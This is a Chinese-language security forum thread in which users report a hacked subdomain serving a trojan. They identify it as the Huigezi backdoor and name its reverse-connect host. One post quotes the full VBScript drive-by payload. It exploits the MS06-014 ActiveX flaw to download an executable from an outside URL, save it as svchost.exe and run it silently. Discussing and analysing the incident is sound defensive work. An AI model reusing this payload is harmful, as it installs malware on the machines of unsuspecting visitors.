能力值:
(RANK:350 )
|
-
-
2 楼
谢谢你告知,这二级域名是送给monkeycz用了,monkeycz会处理的。
|
能力值:
( LV9,RANK:170 )
|
-
-
3 楼
现在还没改过来,我特意浏览了下,好像没什么事情发生
黑客动画吧 www.hack58.com
|
能力值:
( LV7,RANK:100 )
|
-
-
4 楼
下了半天那个马也没下下来...连接不上.
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
最初由 快雪时晴 发布 现在还没改过来,我特意浏览了下,好像没什么事情发生
0614 MS漏洞利用的.你打了补定肯定什么都没发生拉.
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
最初由 LOCKLOSE 发布 下了半天那个马也没下下来...连接不上.
BS马甲.拖出去砍了
是个灰鸽子.我研究了下
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
反向地址是 adminia.3322.org
|
能力值:
( LV2,RANK:10 )
|
-
-
8 楼
就我的理解,浏览器的功能应限定为下载东西,然后显示出来即可,不知道ms为什么会支持网页代码执行Q.ShellExecute之类危险的操作。
<SCRIPT language=VBScript>
on error resume next
dl = "http://www.gx-gm.com/admin/3322.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="svchost.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</SCRIPT>
|
能力值:
( LV2,RANK:10 )
|
-
-
9 楼
可惜我没遇到
|
能力值:
(RANK:460 )
|
-
-
10 楼
最初由 fslove 发布 今天机器突然不能打开看雪论坛了.百度一搜索.找到了下面的域名 http://monkeycz.pediy.com/
说了好久还没解决问题,.
........
非常感谢你的提醒。
整站已经重新更新过了,我测试了一下,应该没有挂马的地方了。
现在网站已经恢复正常。如果有哪位朋友发现异常,麻烦通知我一声,先谢过了。
|
|
|